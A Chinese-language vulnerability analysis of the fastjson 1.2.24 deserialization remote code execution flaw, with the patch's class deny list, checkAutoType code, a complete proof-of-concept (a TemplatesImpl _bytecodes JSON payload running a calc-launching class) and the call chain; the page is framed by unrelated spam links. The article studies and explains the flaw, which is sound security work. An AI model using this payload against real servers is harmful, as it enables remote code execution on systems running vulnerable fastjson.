成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Fastjson遠程反序列化程序驗證的構造和分析

安全 漏洞
fastjson官方主動爆出fastjson在1.2.24及之前版本存在遠程代碼執行高危安全漏洞。攻擊者可以通過此漏洞遠程執行惡意代碼來入侵服務器。

fastjson是一個java編寫的高性能功能非常完善的JSON庫,應用范圍非常廣,在github上star數都超過8k,在2017年3月15日,fastjson官方主動爆出fastjson在1.2.24及之前版本存在遠程代碼執行高危安全漏洞。攻擊者可以通過此漏洞遠程執行惡意代碼來入侵服務器。

關于漏洞的具體詳情可參考 :https://github.com/alibaba/fastjson/wiki/security_update_20170315

受影響的版本

  1. fastjson <= 1.2.24 

靜態分析

根據官方給出的補丁文件,主要的更新在這個checkAutoType函數上,而這個函數的主要功能就是添加了黑名單,將一些常用的反序列化利用庫都添加到黑名單中。

具體包括:

  1. bsh,com.mchange,com.sun.,java.lang.Thread,java.net.Socket,java.rmi,javax.xml,org.apache.bcel,org.apache.commons.beanutils, 
  2. org.apache.commons.collections.Transformer,org.apache.commons.collections.functors,org.apache.commons.collections4. 
  3. comparators,org.apache.commons.fileupload,org.apache.myfaces.context.servlet,org.apache.tomcat,org.apache.wicket.util, 
  4. org.codehaus.groovy.runtime,org.hibernate,org.jboss,org.mozilla.javascript,org.python.core,org.springframework 

下面我們來分析checkAutoType的函數實現:

  1. if (typeName == null) { 
  2.             return null
  3.         } 
  4.   
  5.         if (typeName.length() >= maxTypeNameLength) { 
  6.             throw new JSONException("autoType is not support. " + typeName); 
  7.         } 
  8.   
  9.         final String className = typeName.replace('$''.'); 
  10.   
  11.         if (autoTypeSupport || expectClass != null) { 
  12.             for (int i = 0; i < acceptList.length; ++i) { 
  13.                 String accept = acceptList[i]; 
  14.                 if (className.startsWith(accept)) { 
  15.                     return TypeUtils.loadClass(typeName, defaultClassLoader); 
  16.                 } 
  17.             } 
  18.   
  19.             for (int i = 0; i < denyList.length; ++i) { 
  20.                 String deny = denyList[i]; 
  21.                 if (className.startsWith(deny)) { 
  22.                     throw new JSONException("autoType is not support. " + typeName); 
  23.                 } 
  24.             } 
  25.         } 
  26.   
  27.         Class<?> clazz = TypeUtils.getClassFromMapping(typeName); 
  28.         if (clazz == null) { 
  29.             clazz = deserializers.findClass(typeName); 
  30.         } 
  31.   
  32.         if (clazz != null) { 
  33.             if (expectClass != null && !expectClass.isAssignableFrom(clazz)) { 
  34.                 throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); 
  35.             } 
  36.   
  37.             return clazz; 
  38.         } 

核心部分就是denyList的處理過程,遍歷denyList,如果引入的庫以denyList中某個deny打頭,就會拋出異常,中斷運行。

程序驗證構造

靜態分析得知,要構造一個可用的程序,肯定得引入denyList的庫。剛開始fastjson官方公布漏洞信息時,當時就嘗試構造驗證程序,怎奈fastjson的代碼確實龐大,還有asm機制,通過asm機制生成的臨時代碼下不了斷點。當時也只能通過在通過類初始化的時候彈出一個計算器,很顯然這個構造方式不具有通用性,最近jackson爆出反序列漏洞,其中就利用了TemplatesImpl類,而這個類有一個字段就是_bytecodes,有部分函數會根據這個_bytecodes生成java實例,簡直不能再更妙,這就解決了fastjson通過字段傳入一個類,再通過這個類執行有害代碼。后來閱讀ysoserial的代碼時也發現在gadgets.java這個文件中也使用到了這個類來動態生成可執行命令的代碼。

下面是一個程序驗證的代碼:

  1. import com.sun.org.apache.xalan.internal.xsltc.DOM; 
  2. import com.sun.org.apache.xalan.internal.xsltc.TransletException; 
  3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 
  4. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 
  5. import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 
  6.   
  7. import java.io.IOException; 
  8.   
  9. public class Test extends AbstractTranslet { 
  10.     public Test() throws IOException { 
  11.         Runtime.getRuntime().exec("calc"); 
  12.     } 
  13.   
  14.     @Override 
  15.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { 
  16.     } 
  17.   
  18.     @Override 
  19.     public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException { 
  20.   
  21.     } 
  22.   
  23.     public static void main(String[] args) throws Exception { 
  24.         Test t = new Test(); 
  25.     } 

這個是Test.java的實現,在Test.java的構造函數中執行了一條命令,彈出計算器。編譯Test.java得到Test.class供后續使用。后續會將Test.class的內容賦值給_bytecodes。讓我們接著分析:

  1. package person; 
  2.   
  3. import com.alibaba.fastjson.JSON; 
  4. import com.alibaba.fastjson.parser.Feature; 
  5. import com.alibaba.fastjson.parser.ParserConfig; 
  6. import org.apache.commons.io.IOUtils; 
  7. import org.apache.commons.codec.binary.Base64; 
  8.   
  9. import java.io.ByteArrayOutputStream; 
  10. import java.io.File; 
  11. import java.io.FileInputStream; 
  12. import java.io.IOException; 
  13.   
  14. /** 
  15.  * Created by web on 2017/4/29. 
  16.  */ 
  17. public class P{ 
  18.   
  19.     public static String readClass(String cls){ 
  20.         ByteArrayOutputStream bos = new ByteArrayOutputStream(); 
  21.         try { 
  22.             IOUtils.copy(new FileInputStream(new File(cls)), bos); 
  23.         } catch (IOException e) { 
  24.             e.printStackTrace(); 
  25.         } 
  26.         return Base64.encodeBase64String(bos.toByteArray()); 
  27.   
  28.     } 
  29.   
  30.     public static void  test_autoTypeDeny() throws Exception { 
  31.         ParserConfig config = new ParserConfig(); 
  32.         final String fileSeparator = System.getProperty("file.separator"); 
  33.         final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class"
  34.         String evilCode = readClass(evilClassPath); 
  35.         final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
  36.         String text1 = "{\"@type\":\"" + NASTY_CLASS + 
  37.                 "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b',\"_outputProperties\":{ }," + 
  38.                 "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n"
  39.         System.out.println(text1); 
  40.         
  41.         Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); 
  42.         //assertEquals(Model.class, obj.getClass()); 
  43.     } 
  44.     public static void main(String args[]){ 
  45.         try { 
  46.             test_autoTypeDeny(); 
  47.         } catch (Exception e) { 
  48.             e.printStackTrace(); 
  49.         } 
  50.     } 

在這個程序驗證代碼中,最核心的部分是_bytecodes,它是要執行的代碼,@type是指定的解析類,fastjson會根據指定類去反序列化得到該類的實例,在默認情況下,fastjson只會反序列化公開的屬性和域,而com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中_bytecodes卻是私有屬性,_name也是私有域,所以在parseObject的時候需要設置Feature.SupportNonPublicField,這樣_bytecodes字段才會被反序列化。_tfactory這個字段在TemplatesImpl既沒有get方法也沒有set方法,所以是設置不了的,彈計算器的圖中展示了但是實際運行卻沒有使用,只能依賴于jdk的實現,作者在1.8.0_25,1.7.0_05測試都能彈出計算器,某些版本中在defineTransletClasses()用到會引用_tfactory屬性導致異常退出。

接下來我們看下TemplatesImpl.java的幾個關鍵函數:

  1. public synchronized Properties getOutputProperties() { 
  2.         try { 
  3.             return newTransformer().getOutputProperties(); 
  4.         } 
  5.         catch (TransformerConfigurationException e) { 
  6.             return null
  7.         } 
  8.     } 
  1. public synchronized Transformer newTransformer() 
  2.         throws TransformerConfigurationException 
  3.     { 
  4.         TransformerImpl transformer; 
  5.   
  6.         transformer = new TransformerImpl(getTransletInstance(), _outputProperties, 
  7.             _indentNumber, _tfactory); 
  8.   
  9.         if (_uriResolver != null) { 
  10.             transformer.setURIResolver(_uriResolver); 
  11.         } 
  12.   
  13.         if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) { 
  14.             transformer.setSecureProcessing(true); 
  15.         } 
  16.         return transformer; 
  17.     } 
  1. private Translet getTransletInstance() 
  2.         throws TransformerConfigurationException { 
  3.         try { 
  4.             if (_name == nullreturn null
  5.   
  6.             if (_class == null) defineTransletClasses(); 
  7.   
  8.             // The translet needs to keep a reference to all its auxiliary 
  9.             // class to prevent the GC from collecting them 
  10.             AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance(); 
  11.             translet.postInitialization(); 
  12.             translet.setTemplates(this); 
  13.             translet.setServicesMechnism(_useServicesMechanism); 
  14.             if (_auxClasses != null) { 
  15.                 translet.setAuxiliaryClasses(_auxClasses); 
  16.             } 
  17.   
  18.             return translet; 
  19.         } 
  20.         catch (InstantiationException e) { 
  21.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  22.             throw new TransformerConfigurationException(err.toString()); 
  23.         } 
  24.         catch (IllegalAccessException e) { 
  25.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  26.             throw new TransformerConfigurationException(err.toString()); 
  27.         } 
  28.     } 
  1. private void defineTransletClasses() 
  2.         throws TransformerConfigurationException { 
  3.   
  4.         if (_bytecodes == null) { 
  5.             ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR); 
  6.             throw new TransformerConfigurationException(err.toString()); 
  7.         } 
  8.   
  9.         TransletClassLoader loader = (TransletClassLoader) 
  10.             AccessController.doPrivileged(new PrivilegedAction() { 
  11.                 public Object run() { 
  12.                     return new TransletClassLoader(ObjectFactory.findClassLoader()); 
  13.                 } 
  14.             }); 
  15.   
  16.         try { 
  17.             final int classCount = _bytecodes.length; 
  18.             _class = new Class[classCount]; 
  19.   
  20.             if (classCount > 1) { 
  21.                 _auxClasses = new Hashtable(); 
  22.             } 
  23.   
  24.             for (int i = 0; i < classCount; i++) { 
  25.                 _class[i] = loader.defineClass(_bytecodes[i]); 
  26.                 final Class superClass = _class[i].getSuperclass(); 
  27.   
  28.                 // Check if this is the main class 
  29.                 if (superClass.getName().equals(ABSTRACT_TRANSLET)) { 
  30.                     _transletIndex = i; 
  31.                 } 
  32.                 else { 
  33.                     _auxClasses.put(_class[i].getName(), _class[i]); 
  34.                 } 
  35.             } 
  36.   
  37.             if (_transletIndex < 0) { 
  38.                 ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name); 
  39.                 throw new TransformerConfigurationException(err.toString()); 
  40.             } 
  41.         } 
  42.         catch (ClassFormatError e) { 
  43.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name); 
  44.             throw new TransformerConfigurationException(err.toString()); 
  45.         } 
  46.         catch (LinkageError e) { 
  47.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  48.             throw new TransformerConfigurationException(err.toString()); 
  49.         } 
  50.     } 

在getTransletInstance調用defineTransletClasses,在defineTransletClasses方法中會根據_bytecodes來生成一個java類,生成的java類隨后會被getTransletInstance方法用到生成一個實例,也也就到了最終的執行命令的位置Runtime.getRuntime.exec()

下面我們上一張調用鏈的圖:

 

簡單來說就是:

  1. JSON.parseObject 
  2. ... 
  3. JavaBeanDeserializer.deserialze 
  4. ... 
  5. FieldDeserializer.setValue 
  6. ... 
  7. TemplatesImpl.getOutputProperties 
  8. TemplatesImpl.newTransformer 
  9. TemplatesImpl.getTransletInstance 
  10. ... 
  11. Runtime.getRuntime().exec 

附上一張成功執行圖:

總結

該程序驗證的影響jdk 1.7,1.8版本,1.6未測試,但是需要在parseObject的時候設置Feature.SupportNonPublicField。

責任編輯:武曉燕 來源: 綠盟科技博客
相關推薦

2011-06-01 15:05:02

序列化反序列化

2011-05-18 15:20:13

XML

2009-08-24 17:14:08

C#序列化

2009-08-06 11:16:25

C#序列化和反序列化

2009-06-14 22:01:27

Java對象序列化反序列化

2022-08-06 08:41:18

序列化反序列化Hessian

2019-11-20 10:07:23

web安全PHP序列化反序列化

2009-08-25 14:24:36

C#序列化和反序列化

2018-03-19 10:20:23

Java序列化反序列化

2009-09-09 14:45:41

XML序列化和反序列化

2009-09-09 15:47:27

XML序列化和反序列化

2010-03-19 15:54:21

Java Socket

2009-07-29 13:39:02

JSON序列化和反序列ASP.NET AJA

2021-11-18 07:39:41

Json 序列化Vue

2009-09-09 16:10:11

.NET序列化和反序列

2009-08-25 14:43:26

C#序列化和反序列化

2023-12-13 13:49:52

Python序列化模塊

2023-12-26 07:26:07

Java序列化反序列化機制

2012-04-13 10:45:59

XML

2011-06-01 14:50:48

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 一区二区在线观看免费视频 | 久久精品黄色 | 亚州精品天堂中文字幕 | 四虎影院久久 | 久久成人在线视频 | 精品久久国产老人久久综合 | 久久久高清| 国产免费看 | 国产一级视频在线播放 | 天天射天天操天天干 | 欧美一级高潮片免费的 | 超碰在线人人干 | 在线观看国产视频 | 久久精品无码一区二区三区 | 成人美女免费网站视频 | 喷潮网站 | 久久四虎| 国产激情91久久精品导航 | 欧美日韩视频一区二区 | 国产一区二区久久久 | www亚洲精品 | 亚洲五码在线 | 日日操视频| 国产片网站 | 欧美一区二区三区在线播放 | 久久久久久久国产 | 一区二区三区免费在线观看 | 欧美午夜视频 | 日韩在线免费视频 | 日韩视频三区 | www.99热| 亚洲国产高清高潮精品美女 | 午夜影院视频 | 亚洲一区中文 | av手机在线免费观看 | 国产ts人妖系列高潮 | 99国产精品99久久久久久 | 久久1区 | 日日综合 | 国产色婷婷精品综合在线手机播放 | 自拍视频网站 |